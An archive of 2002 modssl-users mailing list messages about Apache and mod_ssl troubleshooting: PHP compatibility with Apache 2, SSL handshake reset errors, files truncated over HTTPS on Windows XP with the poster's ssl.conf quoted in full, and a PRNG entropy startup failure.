	 Wed, 21 Aug 2002 01:57:19 -0700
Received: from scanmail1.cableone.net [24.116.0.121] by scanmail1.cableone.net
  (SMTPD32-7.04) id A5CE87500CC; Wed, 21 Aug 2002 01:56:46 -0700
Received: from  (183-170.twicpe.cableone.net [24.116.183.170]) by mail.cableone.net with SMTP (MailShield v2.04 - WIN32 Jul 17 2001 17:12:42); Wed, 21 Aug 2002 01:56:46 -0600
Message-Id: <5.1.1.6.0.20020821022310.00a5b0e0@mail.developersdesk.com>
X-Sender: apache%developersdesk.com@mail.developersdesk.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Wed, 21 Aug 2002 03:03:53 -0600
To: modssl-users@modssl.org
From: Rick Widmer 
Subject: Re: Compile of Apache
In-Reply-To: <200208202116.g7KLGv4h003578@ns1.microanswers.net>
References: <3D514619.6060007@cnpsa.embrapa.br>
 <3D514619.6060007@cnpsa.embrapa.br>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-SMTP-HELO: robinton.developersdesk.com
X-SMTP-MAIL-FROM: apache@developersdesk.com
X-SMTP-RCPT-TO: modssl-users@modssl.org
X-SMTP-PEER-INFO: 183-170.twicpe.cableone.net [24.116.183.170]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Rick Widmer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 04:21 PM 8/20/02 -0500, you wrote:
>Perhaps it's the "I love to be on the bleeding edge" drive in me which has
>regrettably proven to be something other than a brilliant move so many times,
>but I question why would you not install Apache 2.0.40 and skip the 1.3.26
>all together?

For me the fact that PHP doesn't work well with Apache 2 yet is a 
killer.  I hate
to say it, but Apache 2.0.3x stable has been compared to a Microsoft version 1,
a late beta version released to the public for wide testing.  There are a 
number of
things that are still not working right.  (Sorry I can't list them.)

There was very little warning about the stable version of Apache 2, and no 
time to
make sure PHP was compatible.  The next PHP release of PHP should support
Apache 2 out of the box.  Still there is the feeling on PHP mailing lists 
that Apache
2 is still not quite there yet.

Rick

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 11:20:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA08143; Wed, 21 Aug 2002 11:19:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.p2.experian.nl id LAA08136; Wed, 21 Aug 2002 11:18:57 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by www.p2.experian.nl (Postfix) with ESMTP id 4325C34A35
	for ; Wed, 21 Aug 2002 11:18:56 +0200 (CEST)
Received: from shivaya.namah.om (unknown [10.200.3.17])
	by www.p2.experian.nl (Postfix) with SMTP id 2F70A34A36
	for ; Wed, 21 Aug 2002 11:18:54 +0200 (CEST)
Date: Wed, 21 Aug 2002 10:22:53 +0200
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: error 104
Message-Id: <20020821102253.3e7a04cd.jeroen@experian.nl>
Organization: Experian nederland b.v.
X-Mailer: Sylpheed version 0.7.5 (GTK+ 1.2.10; i586-mandrake-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by Experian Advanced Mail Virusscanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have this error a lot of times in my log.

[Tue Aug 20 14:43:41 2002] [error] mod_ssl: SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[Tue Aug 20 14:43:41 2002] [error] System: Connection reset by peer (errno: 104)

What does it mean?

I use apache 1.3.26 with mod_ssl 2.8.10 with openssl 0.9.6d on Mandrake.
People are using this web server with all kind of browsers, but I think the MS explorer stuff is causing this.

Cheers,
Jeroen. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 14:08:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA11519; Wed, 21 Aug 2002 14:07:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tera.umi.com id OAA11502; Wed, 21 Aug 2002 14:06:05 +0200 (MET DST)
Received: from aamail02.umi.bhowell.com (aamail02.umi.bhowell.com [165.215.60.27])
	by tera.umi.com (8.11.6/8.11.6) with ESMTP id g7LC19M10469
	for ; Wed, 21 Aug 2002 08:01:10 -0400
Received: from aamailgfi.umi.bhowell.com ([172.24.3.36]) by aamail02.umi.bhowell.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id RDPBBJFX; Wed, 21 Aug 2002 07:59:28 -0400
Content-Class: urn:content-classes:message
Received: from mail pickup service by aamailgfi.umi.bhowell.com with Microsoft SMTPSVC; Wed, 21 Aug 2002 08:05:28 -0400
Received: from tera.umi.com ([192.195.245.144]) by aamailgfi.umi.bhowell.com with Microsoft SMTPSVC(5.0.2195.5329); Tue, 20 Aug 2002 19:52:19 -0400
Content-Transfer-Encoding: 7bit
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252]) by tera.umi.com (8.11.6/8.11.6) with ESMTP id g7KNlRM31048 for ; Tue, 20 Aug 2002 19:47:27 -0400
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Received: by mmx.engelschall.com (Postfix) id 6744E19493; Wed, 21 Aug 2002 01:52:12 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id 1F9B719389 for ; Wed, 21 Aug 2002 01:52:12 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA25227; Wed, 21 Aug 2002 01:51:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for  from hotmail.com id BAA25223; Wed, 21 Aug 2002 01:51:02 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 20 Aug 2002 16:49:57 -0700
Received: from 156.153.254.10 by lw11fd.law11.hotmail.msn.com with HTTP; Tue, 20 Aug 2002 23:49:56 GMT
X-Originating-IP: [156.153.254.10]
From: "Edward Wong" 
To: 
Subject: Corrupt Jar and Cab files
Date: Tue, 20 Aug 2002 16:49:56 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1"
Message-ID: 
X-OriginalArrivalTime: 20 Aug 2002 23:49:57.0039 (UTC) FILETIME=[49D5F3F0:01C248A4]
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,

I'm seeing strange behavior when running apache 2.0.39 on Windows XP, where 
jar and cab files are truncated after after only 16K or so (my jar/cab files 
are actually around 100K).  This seems to happen with just about any 
browser, regardless of the JVM.  Also, this issue only occurs on Windows XP. 
  Win2k, WinNT, and Linux all work properly.

In Windows XP under http, everything seems to work just fine.  Under https, 
everything works fine EXCEPT for the jar and cab files.  Taking a look at 
the java cache shows that natually, the jar and cab files are missing.  My 
ssl conf files are as follows:

-------------------ssl.conf------------------------

#
# This is the Apache server configuration file providing SSL support.
# It contains the configuration directives to instruct the server how to
# serve pages over an https connection. For detailing information about 
these
# directives see 
#
#   For the moment, see  for this info.
#   The documents are still being prepared from material donated by the
#   modssl project.
#

#
# When we also provide SSL we have to listen to the
# standard HTTP port (see above) and to the HTTPS port
#

include conf/ssllisten.conf

##
##  SSL Global Context
##
##  All SSL configuration in this context applies both to
##  the main server and all SSL-enabled virtual hosts.
##

#
#   Some MIME-types for downloading Certificates and CRLs
#
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
AddType application/x-509-ca-cert  .csr

#   Pass Phrase Dialog:
#   Configure the pass phrase gathering process.
#   The filtering dialog program (`builtin' is a internal
#   terminal dialog) has to provide the pass phrase on stdout.
#SSLPassPhraseDialog  exec:certificates/getPassword.exe

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First the mechanism
#   to use and second the expiring timeout (in seconds).
#SSLSessionCache        none
#SSLSessionCache        shmht:logs/ssl_scache(512000)
#SSLSessionCache        shmcb:logs/ssl_scache(512000)
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

#   Semaphore:
#   Configure the path to the mutual exclusion semaphore the
#   SSL engine uses internally for inter-process synchronization.
SSLMutex  file:logs/ssl_mutex

#   Pseudo Random Number Generator (PRNG):
#   Configure one or more sources to seed the PRNG of the
#   SSL library. The seed data should be of good random quality.
#   WARNING! On some platforms /dev/random blocks if not enough entropy
#   is available. This means you then cannot use the /dev/random device
#   because it would lead to very long connection times (as long as
#   it requires to make more entropy available). But usually those
#   platforms additionally provide a /dev/urandom device which doesn't
#   block. So, if available, use this one instead. Read the mod_ssl User
#   Manual for more details.
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

#   Logging:
#   The home of the dedicated SSL protocol logfile. Errors are
#   additionally duplicated in the general error log file.  Put
#   this somewhere where it cannot be used for symlink attacks on
#   a real server (i.e. somewhere where only root can write).
#   Log levels are (ascending order: higher ones include lower ones):
#   none, error, warn, info, trace, debug.
#SSLLog      logs/ssl_engine_log
#SSLLogLevel warn


#   SSL Cipher Suite:
include conf/ciphers.conf

##
## SSL Virtual Host Context
##

include conf/sslvirtualhost.conf




--------and sslvirtualhost.conf--------




#DocumentRoot "doc"
#ServerAdmin you@your.address
ErrorLog logs/error_log
TransferLog logs/access_log
UseCanonicalName On

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again. A test
#   certificate can be generated with `make certificate' under
#   built time. Keep in mind that if you've both a RSA and a DSA
#   certificate you can configure both in parallel (to also allow
#   the use of DSA ciphers, etc.)

SSLCertificateFile certificates/server.crt


#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.  Keep in mind that if
#   you've both a RSA and a DSA private key you can configure
#   both in parallel (to also allow the use of DSA ciphers, etc.)

SSLCertificateKeyFile certificates/server.key


#   Server Certificate Chain:
#   Point SSLCertificateChainFile at a file containing the
#   concatenation of PEM encoded CA certificates which form the
#   certificate chain for the server certificate. Alternatively
#   the referenced file can be the same as SSLCertificateFile
#   when the CA certificates are directly appended to the server
#   certificate for convinience.

#SSLCertificateChainFile certificates/server.crt


#   Certificate Authority (CA):
#   Set the CA certificate verification path where to find CA
#   certificates for client authentication or alternatively one
#   huge file containing all of them (file must be PEM encoded)
#   Note: Inside SSLCACertificatePath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCACertificatePath /Apache2/conf/ssl.crt
#SSLCACertificateFile /Apache2/conf/ssl.crt/ca-bundle.crt

#   Certificate Revocation Lists (CRL):
#   Set the CA revocation path where to find CA CRLs for client
#   authentication or alternatively one huge file containing all
#   of them (file must be PEM encoded)
#   Note: Inside SSLCARevocationPath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCARevocationPath /Apache2/conf/ssl.crl
#SSLCARevocationFile /Apache2/conf/ssl.crl/ca-bundle.crl

#   Client Authentication (Type):
#   Client certificate verification type and depth.  Types are
#   none, optional, require and optional_no_ca.  Depth is a
#   number which specifies how deeply to verify the certificate
#   issuer chain before deciding the certificate is not valid.
#SSLVerifyClient require
#SSLVerifyDepth  10

#   Access Control:
#   With SSLRequire you can do per-directory access control based
#   on arbitrary complex boolean expressions containing server
#   variable checks and other lookup directives.  The syntax is a
#   mixture between C and Perl.  See the mod_ssl documentation
#   for more details.
#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#

#   SSL Engine Options:
#   Set various options for the SSL engine.
#   o FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means 
that
#     the standard Auth/DBMAuth methods can be used for access control.  The
#     user name is the `one line' version of the client's X.509 certificate.
#     Note that no password is obtained from the user. Every entry in the 
user
#     file needs this password: `xxj31ZMTZzkVA'.
#   o ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the certificates
#     into CGI scripts.
#   o StdEnvVars:
#     This exports the standard SSL/TLS related `SSL_*' environment 
variables.
#     Per default this exportation is switched off for performance reasons,
#     because the extraction step is an expensive operation and is usually
#     useless for serving static content. So one usually enables the
#     exportation for CGI and SSI requests only.
#   o CompatEnvVars:
#     This exports obsolete environment variables for backward compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use 
this
#     to provide compatibility to existing CGI scripts.
#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
#     under a "Satisfy any" situation, i.e. when it applies access is denied
#     and no other module can change it.
#   o OptRenegotiate:
#     This enables optimized SSL connection renegotiation handling when SSL
#     directives are used in per-directory context.
SSLOptions +StdEnvVars +StrictRequire +OptRenegotiate

    SSLOptions +StdEnvVars



#   SSL Protocol Adjustments:
#   The safe and default but still SSL/TLS standard compliant shutdown
#   approach is that mod_ssl sends the close notify alert but doesn't wait 
for
#   the close notify alert from client. When you need a different shutdown
#   approach you can use one of the following variables:
#   o ssl-unclean-shutdown:
#     This forces an unclean shutdown when the connection is closed, i.e. no
#     SSL close notify alert is send or allowed to received.  This violates
#     the SSL/TLS standard but is needed for some brain-dead browsers. Use
#     this when you receive I/O errors because of the standard approach 
where
#     mod_ssl sends the close notify alert.
#   o ssl-accurate-shutdown:
#     This forces an accurate shutdown when the connection is closed, i.e. a
#     SSL close notify alert is send and mod_ssl waits for the close notify
#     alert of the client. This is 100% SSL/TLS standard compliant, but in
#     practice often causes hanging connections with brain-dead browsers. 
Use
#     this only for browsers where you know that their SSL implementation
#     works correctly.
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




Any and all help is greatly appreciated.

--Edward Wong


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 16:17:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA15336; Wed, 21 Aug 2002 16:16:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ihemail1.firewall.lucent.com id QAA15265; Wed, 21 Aug 2002 16:15:08 +0200 (MET DST)
Received: from nj7460exch001h.wins.lucent.com (h135-17-42-36.lucent.com [135.17.42.36])
	by ihemail1.firewall.lucent.com (Switch-2.2.2/Switch-2.2.0) with ESMTP id g7LEF6029191
	for ; Wed, 21 Aug 2002 10:15:06 -0400 (EDT)
Received: by nj7460exch001h.ho.lucent.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 21 Aug 2002 10:15:06 -0400
Message-ID: 
From: "Shah, Kishor (Kishor)" 
To: "'modssl-users@modssl.org'" 
Subject: Apache Start-up error
Date: Wed, 21 Aug 2002 10:15:03 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shah, Kishor (Kishor)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Friends,

I am trying to start-up Apache but getting the following errors:
[Wed Aug 21 09:52:02 2002] [warn] Init: PRNG still contains insufficient entropy
                                                                             
[Wed Aug 21 09:52:02 2002] [error] Init: Failed to generate temporary 512 bit RS
A private key                                                                   

My environment is, Solaris 2.8, Apache 2.0.40 with mod_ssl, OpenSSL 0.96g.

I have tried various things in ssl.conf file:

1) Using the default setting for SSLRandomSeed directive.
SSLRandomSeed startup builtin 
 
2) Creating a file with random data and trying,           
           
#SSLRandomSeed startup file:/tmp/.rnd 1024 

3) One thread suggested to put the directives in the httpd.conf, but that did not help either.

What am I doing wrong here and how can I resolve this ? Any help/suggestions are greatly appreciated as I'm new to Apache/SSL world.

Thanks,

Kishor Shah
email - kishorshah@lucent.com


-----Original Message-----
From: Edward Wong [mailto:ed_l_wong@hotmail.com]
Sent: Wednesday, August 21, 2002 1:43 AM
To: modssl-users@modssl.org
Subject: Re: Corrupt Jar and Cab files


One more thing:  this issue actually applies to all files of any type.  
Anything bigger than about 30K gets truncated.

--Ed


>From: "Edward Wong" 
>Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Corrupt Jar and Cab files
>Date: Tue, 20 Aug 2002 16:49:56 -0700
>MIME-Version: 1.0
>X-Originating-IP: [156.153.254.10]
>Received: from [195.27.130.252] by hotmail.com (3.2) with ESMTP id 
>MHotMailBF2C214600B44004310CC31B82FC073D0; Tue, 20 Aug 2002 16:52:48 -0700
>Received: by mmx.engelschall.com (Postfix)id 6744E19493; Wed, 21 Aug 2002 
>01:52:12 +0200 (CEST)
>Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch 
>[129.132.7.153])by mmx.engelschall.com (Postfix) with ESMTP id 
>1F9B719389for ; Wed, 21 Aug 2002 
>01:52:12 +0200 (CEST)
>Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-Lid 
>BAA25227; Wed, 21 Aug 2002 01:51:15 +0200 (MET DST)
>Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
>from hotmail.com id BAA25223; Wed, 21 Aug 2002 
>01:51:02 +0200 (MET DST)
>Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; 
>Tue, 20 Aug 2002 16:49:57 -0700
>Received: from 156.153.254.10 by lw11fd.law11.hotmail.msn.com with 
>HTTP;Tue, 20 Aug 2002 23:49:56 GMT
>From owner-mmx-modssl-users@mmx.engelschall.com Tue, 20 Aug 2002 16:53:34 
>-0700
>Message-ID: 
>X-OriginalArrivalTime: 20 Aug 2002 23:49:57.0039 (UTC) 
>FILETIME=[49D5F3F0:01C248A4]
>Sender: owner-modssl-users@modssl.org
>Precedence: bulk
>X-Sender: "Edward Wong" 
>X-List-Manager: Majordomo [version 1.94.4]
>X-List-Name: modssl-users
>
>Hello All,
>
>I'm seeing strange behavior when running apache 2.0.39 on Windows XP, where 
>jar and cab files are truncated after after only 16K or so (my jar/cab 
>files are actually around 100K).  This seems to happen with just about any 
>browser, regardless of the JVM.  Also, this issue only occurs on Windows 
>XP.  Win2k, WinNT, and Linux all work properly.
>
>In Windows XP under http, everything seems to work just fine.  Under https, 
>everything works fine EXCEPT for the jar and cab files.  Taking a look at 
>the java cache shows that natually, the jar and cab files are missing.  My 
>ssl conf files are as follows:
>
>-------------------ssl.conf------------------------
>
>#
># This is the Apache server configuration file providing SSL support.
># It contains the configuration directives to instruct the server how to
># serve pages over an https connection. For detailing information about 
>these
># directives see 
>#
>#   For the moment, see  for this info.
>#   The documents are still being prepared from material donated by the
>#   modssl project.
>#
>
>#
># When we also provide SSL we have to listen to the
># standard HTTP port (see above) and to the HTTPS port
>#
>
>include conf/ssllisten.conf
>
>##
>##  SSL Global Context
>##
>##  All SSL configuration in this context applies both to
>##  the main server and all SSL-enabled virtual hosts.
>##
>
>#
>#   Some MIME-types for downloading Certificates and CRLs
>#
>AddType application/x-x509-ca-cert .crt
>AddType application/x-pkcs7-crl    .crl
>AddType application/x-509-ca-cert  .csr
>
>#   Pass Phrase Dialog:
>#   Configure the pass phrase gathering process.
>#   The filtering dialog program (`builtin' is a internal
>#   terminal dialog) has to provide the pass phrase on stdout.
>#SSLPassPhraseDialog  exec:certificates/getPassword.exe
>
>#   Inter-Process Session Cache:
>#   Configure the SSL Session Cache: First the mechanism
>#   to use and second the expiring timeout (in seconds).
>#SSLSessionCache        none
>#SSLSessionCache        shmht:logs/ssl_scache(512000)
>#SSLSessionCache        shmcb:logs/ssl_scache(512000)
>SSLSessionCache         dbm:logs/ssl_scache
>SSLSessionCacheTimeout  300
>
>#   Semaphore:
>#   Configure the path to the mutual exclusion semaphore the
>#   SSL engine uses internally for inter-process synchronization.
>SSLMutex  file:logs/ssl_mutex
>
>#   Pseudo Random Number Generator (PRNG):
>#   Configure one or more sources to seed the PRNG of the
>#   SSL library. The seed data should be of good random quality.
>#   WARNING! On some platforms /dev/random blocks if not enough entropy
>#   is available. This means you then cannot use the /dev/random device
>#   because it would lead to very long connection times (as long as
>#   it requires to make more entropy available). But usually those
>#   platforms additionally provide a /dev/urandom device which doesn't
>#   block. So, if available, use this one instead. Read the mod_ssl User
>#   Manual for more details.
>SSLRandomSeed startup builtin
>SSLRandomSeed connect builtin
>#SSLRandomSeed startup file:/dev/random  512
>#SSLRandomSeed startup file:/dev/urandom 512
>#SSLRandomSeed connect file:/dev/random  512
>#SSLRandomSeed connect file:/dev/urandom 512
>
>#   Logging:
>#   The home of the dedicated SSL protocol logfile. Errors are
>#   additionally duplicated in the general error log file.  Put
>#   this somewhere where it cannot be used for symlink attacks on
>#   a real server (i.e. somewhere where only root can write).
>#   Log levels are (ascending order: higher ones include lower ones):
>#   none, error, warn, info, trace, debug.
>#SSLLog      logs/ssl_engine_log
>#SSLLogLevel warn
>
>
>#   SSL Cipher Suite:
>include conf/ciphers.conf
>
>##
>## SSL Virtual Host Context
>##
>
>include conf/sslvirtualhost.conf
>
>
>
>
>--------and sslvirtualhost.conf--------
>
>
>
>
>#DocumentRoot "doc"
>#ServerAdmin you@your.address
>ErrorLog logs/error_log
>TransferLog logs/access_log
>UseCanonicalName On
>
>#   SSL Engine Switch:
>#   Enable/Disable SSL for this virtual host.
>SSLEngine on
>
>#   Server Certificate:
>#   Point SSLCertificateFile at a PEM encoded certificate.  If
>#   the certificate is encrypted, then you will be prompted for a
>#   pass phrase.  Note that a kill -HUP will prompt again. A test
>#   certificate can be generated with `make certificate' under
>#   built time. Keep in mind that if you've both a RSA and a DSA
>#   certificate you can configure both in parallel (to also allow
>#   the use of DSA ciphers, etc.)
>
>SSLCertificateFile certificates/server.crt
>
>
>#   Server Private Key:
>#   If the key is not combined with the certificate, use this
>#   directive to point at the key file.  Keep in mind that if
>#   you've both a RSA and a DSA private key you can configure
>#   both in parallel (to also allow the use of DSA ciphers, etc.)
>
>SSLCertificateKeyFile certificates/server.key
>
>
>#   Server Certificate Chain:
>#   Point SSLCertificateChainFile at a file containing the
>#   concatenation of PEM encoded CA certificates which form the
>#   certificate chain for the server certificate. Alternatively
>#   the referenced file can be the same as SSLCertificateFile
>#   when the CA certificates are directly appended to the server
>#   certificate for convinience.
>
>#SSLCertificateChainFile certificates/server.crt
>
>
>#   Certificate Authority (CA):
>#   Set the CA certificate verification path where to find CA
>#   certificates for client authentication or alternatively one
>#   huge file containing all of them (file must be PEM encoded)
>#   Note: Inside SSLCACertificatePath you need hash symlinks
>#         to point to the certificate files. Use the provided
>#         Makefile to update the hash symlinks after changes.
>#SSLCACertificatePath /Apache2/conf/ssl.crt
>#SSLCACertificateFile /Apache2/conf/ssl.crt/ca-bundle.crt
>
>#   Certificate Revocation Lists (CRL):
>#   Set the CA revocation path where to find CA CRLs for client
>#   authentication or alternatively one huge file containing all
>#   of them (file must be PEM encoded)
>#   Note: Inside SSLCARevocationPath you need hash symlinks
>#         to point to the certificate files. Use the provided
>#         Makefile to update the hash symlinks after changes.
>#SSLCARevocationPath /Apache2/conf/ssl.crl
>#SSLCARevocationFile /Apache2/conf/ssl.crl/ca-bundle.crl
>
>#   Client Authentication (Type):
>#   Client certificate verification type and depth.  Types are
>#   none, optional, require and optional_no_ca.  Depth is a
>#   number which specifies how deeply to verify the certificate
>#   issuer chain before deciding the certificate is not valid.
>#SSLVerifyClient require
>#SSLVerifyDepth  10
>
>#   Access Control:
>#   With SSLRequire you can do per-directory access control based
>#   on arbitrary complex boolean expressions containing server
>#   variable checks and other lookup directives.  The syntax is a
>#   mixture between C and Perl.  See the mod_ssl documentation
>#   for more details.
>#
>#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
>#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
>#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
>#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
>#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
>#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
>#
>
>#   SSL Engine Options:
>#   Set various options for the SSL engine.
>#   o FakeBasicAuth:
>#     Translate the client X.509 into a Basic Authorisation.  This means 
>that
>#     the standard Auth/DBMAuth methods can be used for access control.  
>The
>#     user name is the `one line' version of the client's X.509 
>certificate.
>#     Note that no password is obtained from the user. Every entry in the 
>user
>#     file needs this password: `xxj31ZMTZzkVA'.
>#   o ExportCertData:
>#     This exports two additional environment variables: SSL_CLIENT_CERT 
>and
>#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
>#     server (always existing) and the client (only existing when client
>#     authentication is used). This can be used to import the certificates
>#     into CGI scripts.
>#   o StdEnvVars:
>#     This exports the standard SSL/TLS related `SSL_*' environment 
>variables.
>#     Per default this exportation is switched off for performance reasons,
>#     because the extraction step is an expensive operation and is usually
>#     useless for serving static content. So one usually enables the
>#     exportation for CGI and SSI requests only.
>#   o CompatEnvVars:
>#     This exports obsolete environment variables for backward 
>compatibility
>#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use 
>this
>#     to provide compatibility to existing CGI scripts.
>#   o StrictRequire:
>#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
>#     under a "Satisfy any" situation, i.e. when it applies access is 
>denied
>#     and no other module can change it.
>#   o OptRenegotiate:
>#     This enables optimized SSL connection renegotiation handling when SSL
>#     directives are used in per-directory context.
>SSLOptions +StdEnvVars +StrictRequire +OptRenegotiate
>
>    SSLOptions +StdEnvVars
>
>
>
>#   SSL Protocol Adjustments:
>#   The safe and default but still SSL/TLS standard compliant shutdown
>#   approach is that mod_ssl sends the close notify alert but doesn't wait 
>for
>#   the close notify alert from client. When you need a different shutdown
>#   approach you can use one of the following variables:
>#   o ssl-unclean-shutdown:
>#     This forces an unclean shutdown when the connection is closed, i.e. 
>no
>#     SSL close notify alert is send or allowed to received.  This violates
>#     the SSL/TLS standard but is needed for some brain-dead browsers. Use
>#     this when you receive I/O errors because of the standard approach 
>where
>#     mod_ssl sends the close notify alert.
>#   o ssl-accurate-shutdown:
>#     This forces an accurate shutdown when the connection is closed, i.e. 
>a
>#     SSL close notify alert is send and mod_ssl waits for the close notify
>#     alert of the client. This is 100% SSL/TLS standard compliant, but in
>#     practice often causes hanging connections with brain-dead browsers. 
>Use
>#     this only for browsers where you know that their SSL implementation
>#     works correctly.
>#   Notice: Most problems of broken clients are also related to the HTTP
>#   keep-alive facility, so you usually additionally want to disable
>#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
>#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
>#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
>#   "force-response-1.0" for this.
>SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>
>#   Per-Server Logging:
>#   The home of a custom SSL log file. Use this when you want a
>#   compact non-error SSL logfile on a virtual host basis.
>CustomLog logs/ssl_request_log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>
>
>Any and all help is greatly appreciated.
>
